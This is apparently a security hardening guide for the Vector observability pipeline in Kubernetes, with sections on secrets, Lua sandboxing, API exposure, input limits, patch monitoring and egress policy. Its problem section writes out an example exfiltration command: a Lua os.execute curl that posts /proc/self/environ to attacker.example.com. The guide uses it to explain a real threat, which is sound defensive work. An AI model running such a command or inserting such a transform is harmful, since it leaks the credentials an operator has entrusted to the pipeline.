Vector Log Pipeline Security
Problem
Vector is a high-performance, open source observability data pipeline written in Rust and maintained primarily by Datadog engineers at github.com/vectordotdev/vector. It collects logs, metrics, and traces from sources — Kubernetes pod logs via the Docker or CRI-O file source, systemd journals, HTTP POST endpoints, syslog, Kafka, and dozens of others — applies transforms (parse, filter, enrich, deduplicate, sample), and routes the resulting events to sinks such as Elasticsearch, Splunk, Datadog’s own ingestion API, Amazon S3, and Kafka. Its Rust foundation gives it memory safety guarantees and benchmark-beating throughput, which has made it the dominant replacement for Fluentd and Logstash in Kubernetes-native observability stacks. That widespread adoption, combined with its privileged position reading all pod logs from a DaemonSet, makes Vector a valuable target.
The security surface of a Vector deployment is larger than it initially appears. Vector sources accept arbitrary data from external systems. A crafted log line that triggers an edge case in Vector’s JSON source, regex-based parser, or multiline-detection logic can crash the Vector process, cause it to spin consuming CPU, or produce unexpected events downstream. Log injection — embedding newlines or structured data that Vector interprets as separate events — is a persistent class of problem across all log shippers, and Vector is not immune.
The lua transform is Vector’s escape hatch for logic that VRL (Vector Remap Language) cannot express. It embeds a Lua interpreter inside the Vector process. That interpreter runs in the same OS process as Vector, with access to Vector’s entire address space, open file descriptors, environment variables, and the credentials that Vector loaded at startup. By default, Lua’s standard library — including os.execute(), io.open(), and require() — is available to Lua scripts running inside a Vector transform. A lua transform that calls os.execute("curl -d @/proc/self/environ attacker.example.com") will exfiltrate all environment variables, including every credential Vector loaded, and will do so without any output in Vector’s own metrics or logs unless the operator has instrumented for unexpected egress.
Vector’s configuration file — typically vector.toml or a directory of TOML fragments mounted as a Kubernetes ConfigMap — routinely contains plaintext credentials in sink definitions. A Datadog API key appears directly in [sinks.datadog_logs], an Elasticsearch password appears in [sinks.es], and an S3 access key appears in [sinks.s3]. Because these are stored in ConfigMaps, any pod in the cluster that can read ConfigMaps in Vector’s namespace (or that has cluster-admin via a misconfigured ClusterRoleBinding) can extract every sink credential Vector holds. The ConfigMap is also readable by anyone with kubectl access to the namespace and no RBAC restriction on ConfigMap reads.
Vector’s HTTP source and its built-in management API introduce network-accessible endpoints. The HTTP source receives log events over plain HTTP or HTTPS and, when configured with bearer token authentication, relied on a non-constant-time string comparison for token validation in versions before the fix committed under “use constant-time comparison for HTTP auth token.” A timing oracle in bearer token comparison allows an attacker on the same network segment to brute-force the token character by character. The Vector API ([api] stanza, default port 8686) exposes runtime configuration introspection and, in some builds, tap functionality that streams live events — if not restricted to localhost, this is an unauthenticated window into your log stream.
The development model introduces a specific class of supply-chain risk worth understanding in detail. Because Vector is principally developed by Datadog engineers, security-relevant changes frequently originate as internal pull requests that become public the moment they are merged to the vectordotdev/vector repository on GitHub — before any release is cut. The patch for Lua stdlib restriction was titled “restrict lua stdlib access” and was visible in the public PR diff for approximately ten days before the corresponding Vector release. The constant-time auth token comparison fix appeared as a commit message in the public repository without a CVE being filed. In both cases, an operator monitoring the GitHub commit feed for security-relevant keywords would see the fix before receiving any notification through the Vector release channel. Separately, Vector’s dependency tree — tokio, hyper, openssl bindings — has accumulated CVEs where the lag between upstream CVE publication and a Vector release containing the patched dependency has run two to three weeks. During that window, cargo audit against Vector’s Cargo.lock (available in the Vector Docker image) will surface the vulnerability; the Vector release notes may not mention it explicitly.
To track silent fixes before they become releases, run gh api repos/vectordotdev/vector/commits --jq '.[] | select(.commit.message | test("security|auth|lua|cve|fix.*inject"; "i"))' on a scheduled basis, subscribe to https://github.com/vectordotdev/vector/releases via GitHub’s release notification feed, and use Renovate or Dependabot to watch the Vector container image digest in your Helm chart or DaemonSet manifest. Combine this with cargo audit in your CI pipeline against Vector’s pinned Cargo.lock to catch transitive dependency CVEs before they reach production.
Target systems: Vector 0.38+, Kubernetes DaemonSet deployment, Lua transform (if used).
Threat Model
-
Log injection attacker crafts a malicious log line — oversized JSON, a line containing embedded newlines that splits into multiple events, or a string that triggers backtracking in Vector’s regex-based multiline detection — to crash the Vector DaemonSet pod, cause it to drop subsequent log events, or produce spurious events that pollute downstream security analytics.
-
Insider or supply chain attacker adds or modifies a
luatransform in the Vector ConfigMap. Becauseluatransforms run with full Lua standard library access by default, a malicious transform can callos.execute()to spawn a shell, read/proc/self/environto capture all credentials Vector loaded, and exfiltrate data to an external endpoint — all while appearing to function normally from Vector’s own perspective. -
Patch-gap attacker monitors the
vectordotdev/vectorGitHub repository for commits with messages matchingfix lua,fix auth,constant-time, or similar security-relevant patterns. When such a commit appears, they identify Vector deployments still running the unfixed version — particularly high-value because a Vector DaemonSet reads logs from every pod on every node, making it a comprehensive source of credentials, tokens, and sensitive data logged accidentally by applications. The attacker has a window of days to weeks between the public patch and operator-initiated upgrades. -
Credential extraction attacker gains read access to Vector’s Kubernetes ConfigMap — through a compromised pod’s service account, a misconfigured RBAC ClusterRoleBinding, or direct
kubectlaccess — and reads plaintext Datadog API keys, Elasticsearch passwords, or S3 access keys from thesinksstanzas of the mountedvector.toml.
The blast radius of a compromised Vector DaemonSet is severe: a single compromised Vector pod reads the logs of every container on its node, holds credentials for every configured sink, and may have egress to production data stores (Elasticsearch, S3) that application pods cannot directly reach. A supply-chain attack against Vector’s Lua transform, or exploitation of an unpatched CVE in the window between public patch and upgrade, results in full exfiltration of the log stream plus all sink credentials from the entire cluster.
Configuration / Implementation
Credential Management
Remove all plaintext credentials from vector.toml and the Kubernetes ConfigMap. Vector 0.38+ supports the SECRET[<key>] syntax for delegating secret resolution to an external secret provider process, and also supports standard ${ENV_VAR} interpolation at startup.
# vector.toml — credentials via environment variable interpolation
[sinks.datadog_logs]
type = "datadog_logs"
inputs = ["parse_json"]
default_api_key = "${DATADOG_API_KEY}"
site = "datadoghq.com"
[sinks.elasticsearch]
type = "elasticsearch"
inputs = ["parse_json"]
endpoints = ["https://es.internal:9200"]
auth.strategy = "basic"
auth.user = "${ES_USERNAME}"
auth.password = "${ES_PASSWORD}"
Mount credentials as environment variables from a Kubernetes Secret, not from the ConfigMap:
# vector-daemonset.yaml (env section)
env:
- name: DATADOG_API_KEY
valueFrom:
secretKeyRef:
name: vector-credentials
key: datadog-api-key
- name: ES_USERNAME
valueFrom:
secretKeyRef:
name: vector-credentials
key: elasticsearch-username
- name: ES_PASSWORD
valueFrom:
secretKeyRef:
name: vector-credentials
key: elasticsearch-password
Restrict RBAC so that only the Vector ServiceAccount can read the Vector namespace ConfigMaps and Secrets:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: vector-config-reader
namespace: vector
rules:
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["vector-config"]
verbs: ["get", "watch", "list"]
# Secrets are accessed via env var injection — no Secret read permission needed
Never grant get on Secrets to the Vector ServiceAccount unless using the SECRET[] provider pattern, which requires a dedicated sidecar process with its own narrowly-scoped Secret permissions.
Lua Transform Hardening
Audit your Vector configuration for any lua transform:
grep -rn "type.*=.*\"lua\"" /etc/vector/
If lua transforms exist and cannot be replaced, explicitly strip the dangerous standard library modules at the top of every Lua script:
[transforms.safe_lua]
type = "lua"
inputs = ["raw_logs"]
version = "2"
hooks.process = """
function (event, emit)
-- Disable dangerous stdlib access at script entry
os = nil
io = nil
require = nil
package = nil
load = nil
loadfile = nil
dofile = nil
-- Safe processing logic only below this line
event.log.processed = true
emit(event)
end
"""
The preferred alternative is VRL (Vector Remap Language), which is compiled to a sandboxed bytecode interpreter with no OS, filesystem, or network access:
[transforms.parse_and_enrich]
type = "remap"
inputs = ["raw_logs"]
source = """
# Parse JSON log body
. = parse_json!(string!(.message))
# Enrich with cluster metadata
.cluster = "prod-us-east-1"
.pipeline_version = "2.4.0"
# Drop events that are not structured as expected
if !exists(.level) || !exists(.timestamp) {
abort
}
"""
Establish a code review gate: any change to a lua transform in the Vector ConfigMap must pass a security review before deployment, enforced through your GitOps workflow (e.g., a CODEOWNERS entry requiring approval from the security team for changes to any file matching *vector*.toml or *vector*/*.toml).
HTTP Source Authentication and API Hardening
[sources.http_receiver]
type = "http_server"
address = "0.0.0.0:8080"
tls.enabled = true
tls.crt_file = "/etc/vector/tls/tls.crt"
tls.key_file = "/etc/vector/tls/tls.key"
auth.strategy = "bearer"
auth.token = "${HTTP_SOURCE_TOKEN}"
# Disable the Vector management API in production
[api]
enabled = false
If the API must be enabled for debugging, bind it to localhost only and never expose it via a Service:
[api]
enabled = true
address = "127.0.0.1:8686"
Apply a NetworkPolicy restricting ingress to the HTTP source port to known log-producing namespaces or pods only:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: vector-http-source-ingress
namespace: vector
spec:
podSelector:
matchLabels:
app: vector
policyTypes:
- Ingress
ingress:
- from:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: app-production
ports:
- protocol: TCP
port: 8080
Source Input Validation
Use a filter transform to drop oversized events before they reach parsing transforms, and a throttle transform to bound the event rate per source:
[transforms.drop_oversized]
type = "filter"
inputs = ["kubernetes_logs"]
condition = """
length(string!(.message)) <= 65536
"""
[transforms.rate_limit]
type = "throttle"
inputs = ["drop_oversized"]
threshold = 10000
window_secs = 1.0
key_field = ".kubernetes.pod_name"
[transforms.parse_json]
type = "remap"
inputs = ["rate_limit"]
source = """
parsed, err = parse_json(.message)
if err != null {
# Route unparseable events to a dead-letter topic rather than dropping
.parse_error = err
.raw_message = .message
} else {
. = merge!(., parsed)
}
"""
Monitoring Vector for Silent Fixes
Add cargo audit to your CI pipeline by extracting Vector’s Cargo.lock from the official Docker image and auditing it:
#!/usr/bin/env bash
# check-vector-vulns.sh
set -euo pipefail
VECTOR_IMAGE="timberio/vector:0.38.0-debian"
docker pull "${VECTOR_IMAGE}"
docker create --name vector-audit "${VECTOR_IMAGE}" /bin/true
docker cp vector-audit:/usr/share/doc/vector/Cargo.lock ./vector-Cargo.lock
docker rm vector-audit
cargo audit --file ./vector-Cargo.lock --json | \
jq -e '.vulnerabilities.list | length == 0' || \
{ echo "Vector dependency CVEs found — review before deployment"; exit 1; }
Monitor the Vector GitHub commit feed for security-relevant changes on a schedule:
# Run daily via CI or cron
gh api repos/vectordotdev/vector/commits \
--paginate \
--jq '.[] | select(.commit.message | test("security|auth|lua|cve|fix.*inject|timing|constant.time|sanitize|escape"; "i")) | {sha: .sha[0:8], message: .commit.message, date: .commit.author.date}'
In your Helm values or Kustomize overlay, pin Vector to an image digest and use Renovate to open PRs when the digest changes:
# renovate.json
{
"packageRules": [
{
"matchPackageNames": ["timberio/vector"],
"matchUpdateTypes": ["digest", "minor", "patch"],
"automerge": false,
"reviewers": ["team:security"]
}
]
}
Network Isolation
Restrict Vector DaemonSet egress to known sink endpoints only, blocking all other outbound traffic:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: vector-egress-restrict
namespace: vector
spec:
podSelector:
matchLabels:
app: vector
policyTypes:
- Egress
egress:
# Datadog logs ingestion
- to:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
ports:
- protocol: TCP
port: 443
# Internal Elasticsearch
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: elasticsearch
ports:
- protocol: TCP
port: 9200
# Kubernetes API (for pod metadata enrichment)
- to:
- ipBlock:
cidr: 10.96.0.1/32
ports:
- protocol: TCP
port: 443
# CoreDNS
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: kube-system
ports:
- protocol: UDP
port: 53
Mount the host log directories read-only in the DaemonSet spec:
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
volumeMounts:
- name: varlog
mountPath: /var/log
readOnly: true
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
Expected Behaviour
| Signal | Default Vector Config | Hardened Config |
|---|---|---|
| Plaintext API key in ConfigMap | Datadog API key visible in kubectl get configmap vector-config -o yaml to any user with ConfigMap read access |
API key stored in Kubernetes Secret; ConfigMap contains only ${DATADOG_API_KEY} placeholder; RBAC restricts ConfigMap reads to Vector ServiceAccount only |
lua transform calling os.execute() |
Shell command executes within the Vector process; output captured in Lua return value; no Vector-level log entry generated | os table set to nil at script entry; call raises Lua error; event is dropped or routed to error output; alert fires on VRL-based lua transform detection |
| HTTP source accessed without valid bearer token | Request accepted if auth stanza is absent; timing side-channel if non-constant-time comparison is used in unfixed version |
Constant-time comparison enforced; invalid token returns 401; NetworkPolicy blocks requests from non-whitelisted sources before they reach Vector |
| Upstream CVE in tokio or hyper dependency | Not surfaced until Vector release notes mention it (2–3 week lag typical) | cargo audit CI job extracts Cargo.lock from the Vector image and fails the build pipeline on any known CVE; Renovate opens a PR to update the image digest |
| Log injection via oversized event (>64 KB) | Event passes through to parsing transforms; may cause memory spike or downstream parser error | filter transform drops events exceeding 65,536 bytes before they reach any parsing stage; dropped events counted in component_errors_total metric; alert fires on drop spike |
Trade-offs
| Aspect | Benefit | Cost | Mitigation |
|---|---|---|---|
| VRL over Lua | VRL is sandboxed — no OS, network, or filesystem access; faster execution; statically analysable | Less expressive than Lua for complex stateful logic; no ability to call external libraries | Cover 95% of use cases with VRL’s built-in functions; for remaining cases, use a dedicated enrichment service and the http sink/source pattern rather than lua |
API endpoint disabled (api.enabled: false) |
Eliminates unauthenticated tap and introspection surface in production | No runtime visibility into Vector’s internal topology or live event stream during incidents | Enable API on demand via a mutating webhook or temporary ConfigMap patch during incident investigation; use Vector’s Prometheus metrics endpoint for steady-state observability |
| Strict event size limits | Prevents memory exhaustion and parsing DoS from log flood or injection | Legitimate large events (stack traces, structured audit records) may be silently dropped | Route oversized events to a dead-letter Kafka topic rather than dropping; alert on dead-letter queue depth; tune the threshold based on observed p99 event size |
cargo audit in CI |
Surfaces transitive dependency CVEs before they reach production; closes the patch-gap window | Adds 30–90 seconds to CI build time; may produce false positives for CVEs with no Vector-reachable code path | Cache the cargo-audit binary and advisory database between runs; use --ignore only after documented security review of the specific CVE’s reachability |
Failure Modes
| Failure | Symptom | Detection | Recovery |
|---|---|---|---|
| Secret env var not injected (e.g., Secret deleted or RBAC revoked) | Vector starts but immediately fails to authenticate with the sink; events queue internally and then are dropped when the buffer fills; component_errors_total rises; no data appears in Datadog or Elasticsearch |
Alert on component_errors_total{component_id="datadog_logs"} exceeding threshold; alert on absence of Vector heartbeat events in sink |
Verify Secret exists and contains the correct key (kubectl get secret vector-credentials -o jsonpath='{.data}'); re-create Secret and restart Vector DaemonSet pods via rolling restart |
VRL syntax error in a remap transform |
Vector fails to start; DaemonSet pods crash-loop; all log collection on affected nodes stops | Pod restart count alert; kubectl logs shows VRL parse error at startup |
Roll back the ConfigMap to the previous version via GitOps; Vector will restart successfully against the last-known-good config |
| NetworkPolicy blocks sink endpoint | Logs are collected and buffered internally; buffer fills; new events are dropped; buffer_discarded_events_total rises; no data appears in sink |
Alert on buffer_discarded_events_total; alert on absence of expected log volume in Elasticsearch or Datadog |
Review NetworkPolicy egress rules against current sink IPs/CIDRs; update NetworkPolicy to permit the blocked endpoint; consider using a Service with a stable ClusterIP for internal sinks rather than direct IP rules |
| Vector OOM from log flood before throttle kicks in | Vector pod is OOM-killed; DaemonSet restarts the pod; log collection gap on the affected node; OOMKilled in pod events |
Alert on pod OOM restarts (kube_pod_container_status_last_terminated_reason{reason="OOMKilled"}); monitor node-level log producer event rates |
Lower the throttle threshold; add a filter to drop debug-level events from high-volume namespaces during the flood; set Vector’s --memory-use-limit-bytes flag to trigger graceful back-pressure before OOM |